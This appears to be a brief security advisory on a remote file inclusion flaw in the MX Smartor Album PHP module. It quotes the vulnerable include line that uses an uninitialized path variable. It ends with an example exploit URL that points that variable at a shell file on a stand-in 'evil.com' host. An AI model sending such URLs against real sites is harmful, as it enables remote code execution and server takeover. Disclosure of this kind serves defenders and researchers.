MX Smartor Album Module Remote File Include
Discovered by Paul Bakoyiannis {winsec}
Vulnerable Code:
if ( $mode == 'album_cat' )
{
include($module_root_path. 'includes/album_cat.'.$phpEx);
}
(the rest of the vulnerable code removed for brevity)
Vulnerability: $module_root_path is uninitialized
Source Code:http://www.mx-system.com/index.php?page=4&action=file&file_id=19
Example Exploit: http://[site].com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=http://evil.com/shell.txt?